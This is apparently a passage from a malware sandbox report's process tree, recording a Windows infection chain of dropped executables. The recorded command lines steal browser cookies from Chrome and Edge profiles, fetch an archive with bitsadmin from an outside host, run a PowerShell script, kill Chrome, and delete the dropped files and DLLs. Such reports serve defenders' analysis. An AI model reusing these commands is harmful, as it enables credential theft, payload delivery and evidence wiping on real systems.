                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4748
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                4⤵
                                                                                                                  PID:5672
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:6112
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                  4⤵
                                                                                                                    PID:6032
                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4852
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4200
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5508
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    4⤵
                                                                                                                      PID:5728
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      4⤵
                                                                                                                        PID:2836
                                                                                                                  • C:\Users\Admin\Documents\eaLUdZLc6eISc7LANdWCxGDh.exe
                                                                                                                    "C:\Users\Admin\Documents\eaLUdZLc6eISc7LANdWCxGDh.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5052
                                                                                                                  • C:\Users\Admin\Documents\cSxKPHgt6biLIwaBK_TIiPRZ.exe
                                                                                                                    "C:\Users\Admin\Documents\cSxKPHgt6biLIwaBK_TIiPRZ.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4120
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                      3⤵
                                                                                                                        PID:4612
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3856
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                        3⤵
                                                                                                                          PID:2480
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                          3⤵
                                                                                                                            PID:5888
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                            3⤵
                                                                                                                              PID:2236
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                              3⤵
                                                                                                                                PID:4520
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                3⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5952
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                3⤵
                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                PID:1580
                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                3⤵
                                                                                                                                • Download via BitsAdmin
                                                                                                                                PID:5460
                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9yxuhzdcsCQOsR1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                3⤵
                                                                                                                                  PID:4436
                                                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peUceGKxekxxDSRT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                  3⤵
                                                                                                                                    PID:4872
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                    3⤵
                                                                                                                                      PID:6124
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                      3⤵
                                                                                                                                        PID:4316
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                        3⤵
                                                                                                                                          PID:4260
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                          3⤵
                                                                                                                                            PID:1792
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                            3⤵
                                                                                                                                              PID:5648
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                4⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:5676
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                                                                                              3⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:5460
                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll" KGCToQuEL
                                                                                                                                                4⤵
                                                                                                                                                  PID:5256
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                                3⤵
                                                                                                                                                  PID:4436
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3292
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5468
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1572
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstCE35.tmp\tempfile.ps1"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4380
                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                          3⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:5132
                                                                                                                                                      • C:\Users\Admin\Documents\fjk9J5gy88cxe50ev7Q_WtcL.exe
                                                                                                                                                        "C:\Users\Admin\Documents\fjk9J5gy88cxe50ev7Q_WtcL.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:1668
                                                                                                                                                      • C:\Users\Admin\Documents\r0k2UkLXJqplRdwqN5V0pivo.exe
                                                                                                                                                        "C:\Users\Admin\Documents\r0k2UkLXJqplRdwqN5V0pivo.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:1792
                                                                                                                                                        • C:\Users\Admin\Documents\r0k2UkLXJqplRdwqN5V0pivo.exe
                                                                                                                                                          "C:\Users\Admin\Documents\r0k2UkLXJqplRdwqN5V0pivo.exe" -a
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2740
                                                                                                                                                      • C:\Users\Admin\Documents\6ubpKS5Xbpix8HhMmKnU1Nov.exe
                                                                                                                                                        "C:\Users\Admin\Documents\6ubpKS5Xbpix8HhMmKnU1Nov.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4188
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5704
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                              4⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:5244
                                                                                                                                                        • C:\Users\Admin\Documents\QxLNBD3Qe3gvEUPhSTG5tv9D.exe
                                                                                                                                                          "C:\Users\Admin\Documents\QxLNBD3Qe3gvEUPhSTG5tv9D.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:2424
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im QxLNBD3Qe3gvEUPhSTG5tv9D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\QxLNBD3Qe3gvEUPhSTG5tv9D.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5568
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /im QxLNBD3Qe3gvEUPhSTG5tv9D.exe /f
                                                                                                                                                                4⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5820
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /t 6
                                                                                                                                                                4⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:5556
                                                                                                                                                          • C:\Users\Admin\Documents\U7R0VeKe6Si8_i3tp_hltQS9.exe
                                                                                                                                                            "C:\Users\Admin\Documents\U7R0VeKe6Si8_i3tp_hltQS9.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5020
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 660
                                                                                                                                                              3⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1520
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 676
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:5064
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 680
                                                                                                                                                              3⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4372
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 692
                                                                                                                                                              3⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4664
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 1072
                                                                                                                                                              3⤵
                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1408
                                                                                                                                                          • C:\Users\Admin\Documents\yMifpO56mWFyDBYTTdfFLaY6.exe
                                                                                                                                                            "C:\Users\Admin\Documents\yMifpO56mWFyDBYTTdfFLaY6.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4736
                                                                                                                                                            • C:\Users\Admin\Documents\yMifpO56mWFyDBYTTdfFLaY6.exe
                                                                                                                                                              "{path}"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4132
                                                                                                                                                              • C:\Users\Admin\Documents\yMifpO56mWFyDBYTTdfFLaY6.exe
                                                                                                                                                                "{path}"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5796
                                                                                                                                                              • C:\Users\Admin\Documents\Nqrp6cGmKv5K8foXWC1tNkbU.exe
                                                                                                                                                                "C:\Users\Admin\Documents\Nqrp6cGmKv5K8foXWC1tNkbU.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:1972
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2400
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5840
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5536
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5668
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4648
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5248
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2424
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3480
                                                                                                                                                                      • C:\Users\Admin\Documents\crMHIh9ZnRNGjPdl2O9_blh5.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\crMHIh9ZnRNGjPdl2O9_blh5.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:4108
                                                                                                                                                                        • C:\Users\Admin\Documents\crMHIh9ZnRNGjPdl2O9_blh5.exe
                                                                                                                                                                          C:\Users\Admin\Documents\crMHIh9ZnRNGjPdl2O9_blh5.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4152
                                                                                                                                                                      • C:\Users\Admin\Documents\RwiHQs1bokQAnBmck4HS0ivp.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\RwiHQs1bokQAnBmck4HS0ivp.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4580
                                                                                                                                                                        • C:\Users\Admin\Documents\RwiHQs1bokQAnBmck4HS0ivp.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\RwiHQs1bokQAnBmck4HS0ivp.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:5112
                                                                                                                                                                      • C:\Users\Admin\Documents\xQQLnymcFUBENXjVAiruWUlI.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\xQQLnymcFUBENXjVAiruWUlI.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:420
                                                                                                                                                                        • C:\Users\Admin\Documents\xQQLnymcFUBENXjVAiruWUlI.exe
                                                                                                                                                                          "{path}"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          PID:4288
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im xQQLnymcFUBENXjVAiruWUlI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xQQLnymcFUBENXjVAiruWUlI.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4756
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /im xQQLnymcFUBENXjVAiruWUlI.exe /f
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:5212
                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:4632
                                                                                                                                                                        • C:\Users\Admin\Documents\WtwyZWSno1NEbQiaritLEltr.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\WtwyZWSno1NEbQiaritLEltr.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:944
                                                                                                                                                                        • C:\Users\Admin\Documents\CMEE0LQAkDfOu9nOrdU2kxGK.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\CMEE0LQAkDfOu9nOrdU2kxGK.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4664
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-LFHG9.tmp\CMEE0LQAkDfOu9nOrdU2kxGK.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-LFHG9.tmp\CMEE0LQAkDfOu9nOrdU2kxGK.tmp" /SL5="$40202,138429,56832,C:\Users\Admin\Documents\CMEE0LQAkDfOu9nOrdU2kxGK.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:5156
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-4VR49.tmp\Setup.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-4VR49.tmp\Setup.exe" /Verysilent
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                              PID:5720
                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5952
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:5628
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:3792
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5648
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:380
                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:6000
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:6032
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:2480
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill /im GameBox64bit.exe /f
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:4888
                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:3068
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe" /Silent
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          PID:6076
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:6024
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5928
                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
